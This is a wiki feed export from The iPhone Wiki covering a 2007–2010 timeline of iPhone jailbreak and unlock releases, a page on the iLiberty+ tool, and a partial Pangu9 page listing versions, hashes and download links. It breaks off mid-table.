* 8 October -- [[User:Geohot|Geohot]] comes back to the scene with a new [[bootrom]] exploit believed to work on all devices, as shown on the resurrected [http://www.limera1n.com limera1n web site]. He prompts [[Chronic_Dev_(team)|Chronic Dev Team]] to use his exploit instead of [[SHA-1 Image Segment Overflow|SHAtter]], but, since [[Greenpois0n (jailbreak)|greenpois0n]] is already scheduled to October 10, it may be not possible. [[User:Geohot|Geohot]] ETA'd his [[limera1n]] release to October 11, if [[Greenpois0n (jailbreak)|greenpois0n]] can't be changed to use this new exploit. This decision, however, would burn 2 [[bootrom]] exploits: [[SHA-1 Image Segment Overflow|SHAtter]] itself and the one used by [[limera1n]], which is unpatchable by firmware updates.&lt;br /&gt;
* 6 October -- Chronic Dev Team issues expected ETA of [[Greenpois0n (jailbreak)|greenpois0n]] as October 10, featuring the new [[SHA-1 Image Segment Overflow|SHAtter]] exploit for devices with the [[S5L8930]].&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 30 September -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] posts [http://www.youtube.com/watch?v=adVp-IxcDHI the first video] of an [[K66AP|Apple TV (2nd generation)]] jailbroken via [[SHA-1 Image Segment Overflow|SHAtter]].&lt;br /&gt;
* 27 September -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] posts [http://www.youtube.com/watch?v=aoX1Q8ym2J8 the first video] of an [[N81AP|iPod touch (4th generation)]] jailbroken via [[SHA-1 Image Segment Overflow|SHAtter]].&lt;br /&gt;
* 20 September -- [[User:pod2g|pod2g]] discloses details about the [[usb_control_msg(0xA1, 1) Exploit‎]] here at The iPhone Wiki. It was used in [[redsn0w]] the following day.&lt;br /&gt;
* 9 September -- The existence of [[SHA-1 Image Segment Overflow|SHAtter]] is revealed. Further details were not released, however.&lt;br /&gt;
* 8 September -- Apple releases the [[N81AP|iPod touch (4th generation)]], and iOS 4.1, closing the [[AT+XAPP Vulnerability]].&lt;br /&gt;
* 1 September -- Apple event. They announced the new [[N81AP|iPod touch (4th generation)]], [[K66AP|Apple TV (2nd generation)]], iOS 4.1, and [[iTunes]] 10.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 12 August -- [[Saurik]] releases the first version of PDF Patcher, which installs Apple's patch for the FreeType vulnerability (used in conjunction with other exploits by [[Star]]). It works on firmwares as far back as 2.x, and renders [[iOS]] 3.2.2 and 4.0.2 useless for jailbreakers. Jailbreaking and installing this patch is currently the only way for users of first generation iPod touches and iPhones to protect themselves against malicious use of the exploit.&lt;br /&gt;
* 11 August -- Apple releases [[iOS]] 4.0.2 for [[List of iPhones|iPhone]]/[[List of iPod touches|iPod touch]] and [[iOS|iPhone OS]] 3.2.2 for [[K48AP|iPad]] as a hotfix for [[Star]]'s exploits. [[Ultrasn0w]]'s exploit remains, since there's no [[Baseband Firmware|baseband]] update on those versions.&lt;br /&gt;
* 3 August -- Just before midnight in [[User:planetbeing|planetbeing]]'s timezone [[ultrasn0w]] has been released by the [[iPhone Dev Team]] to [[unlock]] the [[N90AP|iPhone 4]].&lt;br /&gt;
* 1 August -- [[User:Comex|comex]] releases [[Star]], a [[jailbreak]] for all iDevices with [[iOS|iPhone OS]] 3.1.2 through [[iOS]] 4.0.1.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 30 July -- [[N90AP|iPhone 4]] is released in major countries (second wave).&lt;br /&gt;
* 26 July -- Jailbreaking is now officially legal in the U.S.A.: [http://www.eff.org/press/archives/2010/07/26 EFF Wins New Legal Protections for Cell Phone Jailbreakers and Unlockers]&lt;br /&gt;
* 15 July -- Apple releases [[iOS|iPhone OS]] 3.2.1 and [[iOS]] 4.0.1.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 24 June -- [[N90AP|iPhone 4]] is launched.&lt;br /&gt;
* 22 June -- [[iPhone Dev Team]] releases [[PwnageTool]] 4.0 and later 4.0.1 for all devices on 4.0 except those with newer [[bootrom]]s (some [[N72AP|iPod touch (2nd generation)]] and [[N88AP|iPhone 3GS]] devices, and all [[N18AP|iPod touch (3rd generation)]] and newer devices).&lt;br /&gt;
* 21 June -- [[iPhone Dev Team]] releases [[redsn0w]] 0.9.5 to [[jailbreak]] 4.0 on [[N82AP|iPhone 3G]] and [[N72AP|iPhone touch (2nd generation)]] ([[Bootrom 240.4|old bootrom]]), [[iPhone Dev Team]] releases [[ultrasn0w]] 0.93, an unlock for baseband firmwares [[04.26.08]], [[05.11.07]], [[05.12.01]], and [[05.13.04]] and Apple releases [[iOS]] 4.0&lt;br /&gt;
* 19 June -- [[User:Geohot|geohot]] holds a speech at the [[Nuit du hack 2010|Nuit du Hack]]&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 3 May -- Windows version of [[Spirit]] has been updated to not require Windows 98 compatibility mode to run and fixed a photo deletion issue.&lt;br /&gt;
* 2 May -- [[User:Comex|comex]] releases [[Spirit]], an [[untethered jailbreak]] for all iDevices with [[iOS|iPhone OS]] 3.1.2 through 3.2.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 3 April -- Apple releases the [[K48AP|iPad]].&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 12 February -- [[User:sherif hashim|sherif_hashim]] discovers [[AT+XAPP Vulnerability]] and passes it to [[User:MuscleNerd|MuscleNerd]], an elite member of the [[iPhone Dev Team]]&lt;br /&gt;
* 2 February -- Apple releases [[iOS|iPhone OS]] 3.1.3, closing [[usb_control_msg(0x21, 2) Exploit|usb_control_msg(0x21, 2)]] vulnerability used by [[blackra1n]], [[redsn0w]], et. al.&lt;br /&gt;
&lt;br /&gt;
== 2009 ==&lt;br /&gt;
=== November ===&lt;br /&gt;
* 3 November -- [[User:Geohot|geohot]] releases [[blackra1n]] RC3, a software jailbreak for all devices. Includes a new unlock for baseband [[05.11.07]] called [[blacksn0w]] and is also noticeably faster than previous versions.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 11 October -- [[User:Geohot|geohot]] releases [[blackra1n]] RC1, a 30 second software jailbreak for all devices, including a [[tethered jailbreak]] for the [[N18AP|iPod touch (3rd generation)]], and [[N88AP|iPhone 3GS]] and [[N72AP|iPod touch (2nd generation)]] units with newer bootrom revisions.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 24 September -- [[User:iH8sn0w|iH8sn0w]] discovers the [[AT+XEMN Heap Overflow|AT+XEMN]] crash independently.&lt;br /&gt;
* 9 September -- The [[N18AP|iPod touch (3rd generation)]] with [[S5L8922]] processor is released. [[N72AP|iPod touch (2nd generation)]] and [[N88AP|iPhone 3GS]] units continue shipping, but with a new bootrom ([[Bootrom 240.5.1|240.5.1]] and [[Bootrom 359.3.2|359.3.2]] respectively) that is no longer vulnerable to the [[0x24000 Segment Overflow]].&lt;br /&gt;
* 9 September -- Apple releases [[iOS|iPhone OS]] 3.1 (7C144) for iPhones and 3.1.1 (7C145) for iPod touches, closing the [[iBoot Environment Variable Overflow]] and [[AT+XLOG Vulnerability|AT+XLOG]] + [[AT+FNS]] Baseband Exploits.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 14 July -- [[User:Geohot|geohot]] releases [[purplesn0w]], a software unlock for the [[X-Gold 608]] using [[AT+XLOG Vulnerability|the same exploit as ultrasn0w]], but handled differently. Minutes later, an explanation and source code was posted.&lt;br /&gt;
* 7 July -- The [[iPhone Dev Team]] updates [[redsn0w]] and [[ultrasn0w]] to version 0.8, now with [[N88AP|iPhone 3GS]] support. Saurik also updates [[WinterBoard]] to support the [[N88AP|iPhone 3GS]].&lt;br /&gt;
* 3 July -- [[User:Geohot|geohot]] releases [[purplera1n]], a software [[jailbreak]] for the [[N88AP|iPhone 3GS]].&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 28 June -- [[User:Geohot|geohot]] posts pictures on his blog of the first fully jailbroken [[N88AP|iPhone 3GS]].&lt;br /&gt;
* 25 June -- It's discovered that [[N88AP|iPhone 3GS]] is vulnerable to the [[0x24000 Segment Overflow]].&lt;br /&gt;
* 24 June -- The [[iPhone Dev Team]] releases [[ultrasn0w]], an [[unlock]] for [[X-Gold 608]] thanks to [[AT+XLOG Vulnerability|a new exploit]] discovered by [[User:Oranav|Oranav]].&lt;br /&gt;
* 23 June -- [[User:Geohot|geohot]] announces he's found a new exploit in [[iBoot (Bootloader)|iBoot]] he calls [[purplera1n]].&lt;br /&gt;
* 19 June -- Release of [[N88AP|iPhone 3GS]] to the public and the release of [[PwnageTool]] 3.0 and [[redsn0w]] for jailbreaking devices running [[iOS|iPhone OS]] 3.0&lt;br /&gt;
* 17 June -- Apple releases [[iOS|iPhone OS]] 3.0.&lt;br /&gt;
* 8 June -- Apple announces the [[N88AP|iPhone 3GS]].&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 10 March -- Information about the [[0x24000 Segment Overflow]] exploit used for the [[N72AP|iPod touch (2nd generation)]] [[untethered jailbreak]] is released thanks to the combined work of [[chronic]], [[CPICH]], [[User:Posixninja|posixninja]], [[User:Pod2g|pod2g]], [[ius]], [[planetbeing]], [[User:MuscleNerd|MuscleNerd]], and co. after being leaked and sold by [[NitroKey]]. To prevent users wasting their money on a stolen exploit, the Hybrid DevTeam decided to release it immediately.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 31 January -- The [[iPhone Dev Team]] released [[redsn0w Lite]], a [[tethered jailbreak|tethered]] [[N72AP|iPod touch (2nd generation)]] [[jailbreak]]. It combines the [[ARM7 Go]] vulnerability with the well-established [[pwnage]] flow for other Apple mobile devices. It was bundled in a way that allowed usage on [[iOS|iPhone OS]] 2.2.1 by uploading [[iBoot (Bootloader)|iBoot]] from [[iOS|iPhone OS]] 2.1.1, which is vulnerable to [[ARM7 Go]], to the device while in [[DFU Mode]].&lt;br /&gt;
* 29 January -- Apple releases [[iOS|iPhone OS]] 2.2.1, closing the [[AT+stkprof]] exploit.&lt;br /&gt;
* 25 January -- [[0wnboot]] is released to [http://code.google.com/p/chronicdev/ chronicdev google code page], thanks to [[AriX]], [[User:ChronicDev|chronic]], [[CPICH]], [[westbaer]], [[ius]], [[User:Pod2g|pod2g]], the rest of the iPod devel crew on IRC, and to the #iphone-hax lab rats. Within days, [[AriX]] and the [[Chronic Dev (team)|Chronic Dev Team]] got a ramdisk booting for a [[tethered jailbreak]].&lt;br /&gt;
* 17 January -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] [https://twitter.com/MuscleNerd/status/1127346766 shows a video demo] of the first jailbroken [[N72AP|iPod touch (2nd generation)]].&lt;br /&gt;
* 16 January -- [[ARM7 Go]] vulnerability disclosed where else but here on The iPhone Wiki, for developers to poke and prod at.&lt;br /&gt;
* 15 January -- The [[iPhone Dev Team]] [https://twitter.com/iphone_dev/status/1120595069 tweets the VFDecrypt key] for [[iOS|iPhone OS]] 2.2 on [[N72AP|iPod touch (2nd generation)]], demonstrating for the first time that unsigned code can now be run on that device.&lt;br /&gt;
* 1 January -- The [[iPhone Dev Team]] releases [[yellowsn0w]] 0.9 beta for baseband [[02.28.00]].&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 27 December -- [[25C3 presentation &amp;quot;Hacking the iPhone&amp;quot;]]&lt;br /&gt;
* 21 December -- [[User:MuscleNerd|MuscleNerd]], of the [[iPhone Dev Team]] does a live demo of the 3G unlock, dubbed as [[yellowsn0w]]: http://qik.com/video/729275&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 21 November -- Apple releases [[iOS|iPhone OS]] 2.2.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 9 September -- Apple releases [[iOS|iPhone OS]] 2.1. [[N72AP|iPod touch (2nd generation)]], which no longer had the [[Pwnage 2.0]] exploit, is revealed.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 18 August -- Apple releases [[iOS|iPhone OS]] 2.0.2. [[iPhone Dev Team]] releases [http://wikee.iphwn.org/news:pwnage20announcement QuickPwn], a 2.x [[pwnage]]/ramdisk combination exploit that allows jailbreaking without needing to create custom IPSWs.&lt;br /&gt;
* 4 August -- Apple releases [[iOS|iPhone OS]] 2.0.1.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 22 July -- [[TA_Mobile]] hardware dumps the 3G baseband (bootloader 5.8 &amp;amp; FW 1.45.00) by desoldering the [[NOR]].&lt;br /&gt;
* 19 July -- [[iPhone Dev Team]] releases [[PwnageTool]] 2.0, jailbreaking and unlocking the 2.0 software on the [[M68AP|iPhone]] and jailbreaking [[iOS|iPhone OS]] 2.0 on the [[N82AP|iPhone 3G]] and [[N45AP|iPod touch]].&lt;br /&gt;
* 15 July -- Apple releases [[iOS|iPhone OS]] 1.1.5 for the [[N45AP|iPod touch]].&lt;br /&gt;
* 11 July -- [[N82AP|iPhone 3G]] is released. Apple also releases [[iOS|iPhone OS]] 2.0 and MobileMe on the same date, resulting in server issues.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 9 June - [[N82AP|iPhone 3G]] is announced at [[WWDC]] '08.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 3 April -- [[iPhone Dev Team]] releases [[PwnageTool]] 1.0, making use of the [[pmdx exploit]] (to patch RSA checks out of the [[kernel]], to write unsigned to [[NOR]])&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 12 March -- [[iPhone Dev Team]] releases dual-boot jailbreak method, only to be silently fixed in 2.0.&lt;br /&gt;
* 4 March -- [[User:n0b|George Zhu (n000b)]] releases [[iLiberty+|iLiberty / iLiberty+]].&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 28 February -- [[Cydia Application|Cydia]] is released as an open-source alternative to [[Installer.app]], and prepares to take over the jailbreak application scene upon 2.0's release.&lt;br /&gt;
* 26 February -- Apple releases [[iOS|iPhone OS]] 1.1.4.&lt;br /&gt;
* 11 February -- [[User:Zibri|Zibri]] leaks the [[Ramdisk Hack]] in [[ZiPhone]], the first all-in-one unlock, activate, jailbreak solution.&lt;br /&gt;
* 8 February -- [[User:Geohot|geohot]] releases software unlock for 4.6. Apple states 25% of phones were never activated with AT&amp;amp;T.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 28 January -- [[iPhone Dev Team]] releases [[Soft Upgrade]] jailbreak for 1.1.3.&lt;br /&gt;
* 24 January -- [[Nate True]] releases a version of [[iBrickr]] that used the [[Soft Upgrade]] method to jailbreak 1.1.3.&lt;br /&gt;
* 18 January -- [[User:Geohot|Geohot]] and his friends [http://iphonejtag.blogspot.com/2008/01/112-otb-unlocked.html unlocked 1.1.2 OTB 4.6 by test point], the unbeatable version at that time.&lt;br /&gt;
* 18 January -- [[iPhone Dev Team]] posts YouTube video of a jailbroken 1.1.3, which was made possible by the dual boot jailbreak from [[bgm]].&lt;br /&gt;
* 15 January -- Apple releases [[iOS|iPhone OS]] 1.1.3, closing the [[mknod]] exploit. In addition, everything now runs as &amp;quot;mobile&amp;quot; instead of &amp;quot;root.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== 2007 ==&lt;br /&gt;
=== November ===&lt;br /&gt;
* 15 November -- [[Baseband Bootloader|Baseband bootloader]] 4.6 is found on new [[M68AP|iPhone]] devices, which initially had no [[unlock]].&lt;br /&gt;
* 12 November -- Apple releases [[iOS|iPhone OS]] 1.1.2, closing the [[LibTiff]] and [[Symlinks]] exploits.&lt;br /&gt;
* 2 November -- [[JailbreakMe|AppSnapp]] is released, bringing jailbreaking to the mainstream iPhone user.&lt;br /&gt;
&lt;br /&gt;
=== October  ===&lt;br /&gt;
* 23 October -- iPhone-Elite Team releases the [[Virginizer]].&lt;br /&gt;
* 14 October -- [[User:AriX|AriX]] releases iJailBreak, the first automated [[N45AP|iPod touch]] jailbreak for the Mac.&lt;br /&gt;
* 12 October -- [[User:planetbeing|planetbeing]] releases [[touchFree]], the first automated [[N45AP|iPod touch]] [[jailbreak]].&lt;br /&gt;
* 10 October -- [[cmw]] (aka Niacin) and Dre release the LibTiff exploit to jailbreak the [[N45AP|iPod touch]], which is later adapted for use in [[JailbreakMe|AppSnapp]].&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 27 September -- Apple releases [[iOS|iPhone OS]] 1.1.1.&lt;br /&gt;
* 11 September -- [[iPhone Dev Team]] releases [[iUnlock]], first free software unlock.&lt;br /&gt;
* 10 September -- [[IPSF]] releases first paid software unlock.&lt;br /&gt;
* 9 September -- Apple announces the [[N45AP|iPod touch]] at a media event.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 23 August -- [[User:Geohot|geohot]] and team release [[hardware unlock]] method.&lt;br /&gt;
* 21 August -- [[Installer.app]] is released by Nullriver, first GUI apps are distributed.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 23 July -- First phones are used with other carriers by means of [[SIM hacks]].&lt;br /&gt;
* 20 July -- nightwatch adapts a [[toolchain]] to the iPhone. The first apps are compiled.&lt;br /&gt;
* 9 July -- [[iPhone Dev Team]] releases a [[jailbreak]] method. The first use of this is ringtones.&lt;br /&gt;
* 3 July -- DVD Jon first cracks [[activation]]. People can use the apps on the phone without a subscription.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 29 June -- [[M68AP|iPhone]] is released. World's most hyped consumer product.&lt;br /&gt;
* 26 June -- The [[iPhone Dev Team]] was formed.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 9 January -- [[M68AP|iPhone]] is announced on stage by Steve Jobs.&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=ILiberty%2B&amp;diff=109582</id>
		<title>ILiberty+</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=ILiberty%2B&amp;diff=109582"/>
		<updated>2020-12-03T18:12:23Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Dead link&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}&lt;br /&gt;
iLiberty+ is a universal GUI tool to jailbreak, activate and as unlock firmwares 1.1.4 and earlier. It also has some extra functionalities.&lt;br /&gt;
&lt;br /&gt;
iLiberty was first developed as a personal tool for [http://george.insideiphone.com/ George Zhu] himself. However, it later integrated iPlus (a CLI utility developed by AViegas) and became a public tool, and its name was changed to iLiberty+. &lt;br /&gt;
&lt;br /&gt;
Features of iLiberty+ include:&lt;br /&gt;
&lt;br /&gt;
* Full range of iPhone hacking, including but not limited to jailbreaking, activation, unlocking, 3rd party application installation, etc.&lt;br /&gt;
* Fully script-driven, allow unlimited external payloads&lt;br /&gt;
* iPod touch support (jailbreak and application installation)&lt;br /&gt;
* Directly download missing payloads in GUI&lt;br /&gt;
* Proxy support for payloads download&lt;br /&gt;
* Support both Installer and Cydia&lt;br /&gt;
* Automatic online update&lt;br /&gt;
&lt;br /&gt;
iLiberty+ is available on both Windows as well as Mac OS X (named iLibertyX). The main developers are George Zhu, AViegas, francis, and pepijin, with help from many others within the community.&lt;br /&gt;
&lt;br /&gt;
==External Links==&lt;br /&gt;
* [https://web.archive.org/web/20120101122455/http://iliberty.insideiphone.com/Setup/iLibertySetup_1.3.0.113.exe iLiberty 1.3.0 for Windows]&lt;br /&gt;
* [https://web.archive.org/web/20170226073503/http://modmyi.com/files/iLibertyX.dmg Archive of iLibertyX for Mac OSX hosted by modmyi]&lt;br /&gt;
&lt;br /&gt;
[[Category:Hacking Software]]&lt;br /&gt;
[[Category:Jailbreaks]]&lt;br /&gt;
[[Category:Jailbreaking]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Pangu9&amp;diff=109577</id>
		<title>Pangu9</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Pangu9&amp;diff=109577"/>
		<updated>2020-12-03T17:30:03Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Link is down so a web archive link is used&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Infobox software&lt;br /&gt;
| name                   = Pangu9&lt;br /&gt;
| title                  = Pangu9&lt;br /&gt;
| screenshot             = [[File:Pangu9.png|355px]]&lt;br /&gt;
| caption                = Pangu9 v1.0.0 on Windows&lt;br /&gt;
| author                 = Pangu Team&lt;br /&gt;
| developer              = Pangu Team&lt;br /&gt;
| released               = {{Start date|2015|10|14|df=yes}}&lt;br /&gt;
| discontinued           = &lt;br /&gt;
| latest release version = 1.3.2&amp;amp;nbsp;(Windows)&amp;amp;nbsp;/&amp;amp;nbsp;{{Start date and age|2016|08|18|df=yes}}&amp;lt;br /&amp;gt;1.1.1&amp;amp;nbsp;(OS&amp;amp;nbsp;X)&amp;amp;nbsp;/&amp;amp;nbsp;{{Start date and age|2016|03|16|df=yes}}&amp;lt;br /&amp;gt;1.0.0&amp;amp;nbsp;(Apple&amp;amp;nbsp;TV&amp;amp;nbsp;4)&amp;amp;nbsp;/&amp;amp;nbsp;{{Start date and age|2016|03|23|df=yes}}&lt;br /&gt;
| latest release date    = &lt;br /&gt;
| latest preview version = &lt;br /&gt;
| latest preview date    = &lt;br /&gt;
| programming language   = [[wikipedia:C (programming language)|C]]&lt;br /&gt;
| operating system       = [[wikipedia:Microsoft Windows|Windows]] / [[wikipedia:OS X|OS X]] / [[wikipedia:TvOS|tvOS]]&lt;br /&gt;
| size                   = &lt;br /&gt;
| platform               = [[wikipedia:Microsoft Windows|Windows]] / [[wikipedia:OS X|OS X]] / [[wikipedia:TvOS|tvOS]]&lt;br /&gt;
| language               = [[wikipedia:English language|English]]&lt;br /&gt;
| status                 = Active&lt;br /&gt;
| genre                  = Jailbreaking&lt;br /&gt;
| license                = [[wikipedia:Freeware|Freeware]]&lt;br /&gt;
| website                = [http://en.pangu.io en.pangu.io] (English)&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
'''Pangu9''' is the name for a series of [[jailbreak]]s for all devices on iOS 9.0 through 9.1 ([[untethered jailbreak|untethered]]), 9.2 through 9.3.3 on 64-bit devices ([[semi-untethered jailbreak|semi-untethered]]) and [[J42dAP|Apple TV HD]] running tvOS 9.0 - 9.0.1 ([[untethered jailbreak|untethered]]).&lt;br /&gt;
&lt;br /&gt;
The initial version was released on 14 October 2015 and supported iOS 9.0 through 9.0.2, [[untethered jailbreak|untethered]]. On 11 March 2016, Pangu9 1.3.0 (Windows)/1.1.0 (Mac) was released to jailbreak iOS 9.1 [[untethered jailbreak|untethered]] on 64-bit devices. &lt;br /&gt;
&lt;br /&gt;
On 23 March 2016, Pangu released an [[untethered jailbreak]] for [[tvOS]] 9.0 through 9.0.1.&lt;br /&gt;
&lt;br /&gt;
On 24 July 2016, a new version which jailbreaks [[semi-untethered jailbreak|semi-untethered]] iOS 9.2 through 9.3.3 was released on [http://www.pangu.io/?flag=cn Pangu's Chinese site]. An English version was released on [http://en.pangu.io Pangu's English site] a few days later on July 29.&lt;br /&gt;
&lt;br /&gt;
On 19 August 2016, an [http://www.iphonehacks.com/2016/08/install-ios-9-3-3-pangu-jailbreak-using-safari.html on-device jailbreak] was released.&lt;br /&gt;
&lt;br /&gt;
== Download ==&lt;br /&gt;
=== Pangu9 for iOS 9.0-9.1 ===&lt;br /&gt;
==== Windows ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Version&lt;br /&gt;
! SHA-1 Hash&lt;br /&gt;
! Download&lt;br /&gt;
! Changes&lt;br /&gt;
|-&lt;br /&gt;
| 1.0.0&lt;br /&gt;
| &amp;lt;code&amp;gt;c48e1c1f84c1d5ff6046cc4eb7344335b314ba4b&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.0.0.exe 25PP]&lt;br /&gt;
|&lt;br /&gt;
*Initial release&lt;br /&gt;
|-&lt;br /&gt;
| 1.0.1&lt;br /&gt;
| &amp;lt;code&amp;gt;05a0727085de1dd60eb4ec3a7bc343dd317d55d5&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.0.1.exe 25PP]&lt;br /&gt;
| &lt;br /&gt;
* Fixed a bug that leads to 0A error code.&lt;br /&gt;
* Fixed failure of launching on some PCs.&lt;br /&gt;
* Improved success rate.&lt;br /&gt;
* Ensure the removal of the Pangu app.&lt;br /&gt;
|-&lt;br /&gt;
| 1.1.0&lt;br /&gt;
| &amp;lt;code&amp;gt;1467a5a792186f157e11ed4d3b243aea80d95a40&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.1.0.exe 25PP]&lt;br /&gt;
| &lt;br /&gt;
* Improve the success rate and reliability of jailbreak program for 64bit devices&lt;br /&gt;
* Optimize backup process and improve jailbreak speed, and fix an issue that leads to fail to jailbreak due to low disk space in Windows.&lt;br /&gt;
* Fix a bug that leads to an exit of the jailbreak tool due to abnormal network status.&lt;br /&gt;
* Add the re-jailbreak function (only for some devices that were upgraded via iTunes but were detected as jailbroken)&lt;br /&gt;
* Fix a bug that leads to fail to use the instrument function in Xcode.&lt;br /&gt;
|-&lt;br /&gt;
| 1.2.0&lt;br /&gt;
| &amp;lt;code&amp;gt;2f5fae088e7c1b1058ab4dda826d9cab21d6f57d&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.2.0.exe 25PP]&lt;br /&gt;
| &lt;br /&gt;
* Bundle latest Cydia with new Patcyh which fixed failure to open url scheme in MobileSafari&lt;br /&gt;
* Fixed the bug that “preferences -&amp;gt; Storage&amp;amp;iCloud Usage -&amp;gt; Manage Storage” keeps spinning&lt;br /&gt;
|-&lt;br /&gt;
| 1.3.0&lt;br /&gt;
| &amp;lt;code&amp;gt;de1eee0d34fea80f6f798e722614a55b74590b4d&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.3.0.exe 25PP]&lt;br /&gt;
| &lt;br /&gt;
* Add support for iOS 9.1 devices (64bit only)&lt;br /&gt;
|-&lt;br /&gt;
| 1.3.1&lt;br /&gt;
| &amp;lt;code&amp;gt;c1af8b5ff94b28007b8b1523bf297423413659fe&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.3.1.exe 25PP]&lt;br /&gt;
| &lt;br /&gt;
* Make untether of iOS 9.1 more stable&lt;br /&gt;
|-&lt;br /&gt;
| 1.3.2&lt;br /&gt;
| &amp;lt;code&amp;gt;9a88b81c92eebccf8b059eafb5c2bacb169024bc&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.3.2.exe 25PP]&lt;br /&gt;
| &lt;br /&gt;
* ?&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==== Mac ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Version&lt;br /&gt;
! SHA-1 Hash&lt;br /&gt;
! Download&lt;br /&gt;
! Changes&lt;br /&gt;
|-&lt;br /&gt;
| 1.0.0&lt;br /&gt;
| &amp;lt;code&amp;gt;3ab73c9c9b91b0dab97f071f1ac179d198ca90f6&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/pangu9_mac_v1.0.0.dmg 25PP]&lt;br /&gt;
| Initial version&lt;br /&gt;
|-&lt;br /&gt;
| 1.1.0&lt;br /&gt;
| &amp;lt;code&amp;gt;6291c1906f80b9e655ebaf5bbddc388e0636509a&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/pangu9_mac_v1.1.0.dmg 25PP]&lt;br /&gt;
| Add support for iOS 9.1 devices (64-bit devices only)&lt;br /&gt;
|-&lt;br /&gt;
| 1.1.1&lt;br /&gt;
| &amp;lt;code&amp;gt;9b2d03542383b5b4686c8593143eb15ddd4bc740&amp;lt;/code&amp;gt;&lt;br /&gt;
| [https://web.archive.org/web/20180826065722/http://dl.pangu.25pp.com/jb/pangu9_mac_v1.1.1.dmg Archive of 25PP]&lt;br /&gt;
| Make the iOS 9.1 untether more stable&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Pangu9 for tvOS 9.0 - 9.1 (Apple TV) ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Version&lt;br /&gt;
! SHA-1 Hash&lt;br /&gt;
! Download&lt;br /&gt;
! Changes&lt;br /&gt;
|-&lt;br /&gt;
| 1.0.0&lt;br /&gt;
| &amp;lt;code&amp;gt;e87b4afaee4a91cb8e300b8976a03f414ed788da&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/Pangu9_ATV_v1.0.zip 25PP]&lt;br /&gt;
| Initial version&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Pangu9 for iOS 9.2 - 9.3.3 ===&lt;br /&gt;
==== IPA ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Version&lt;br /&gt;
! MD5 Hash&lt;br /&gt;
! SHA-1 Hash&lt;br /&gt;
! Download&lt;br /&gt;
! Changes&lt;br /&gt;
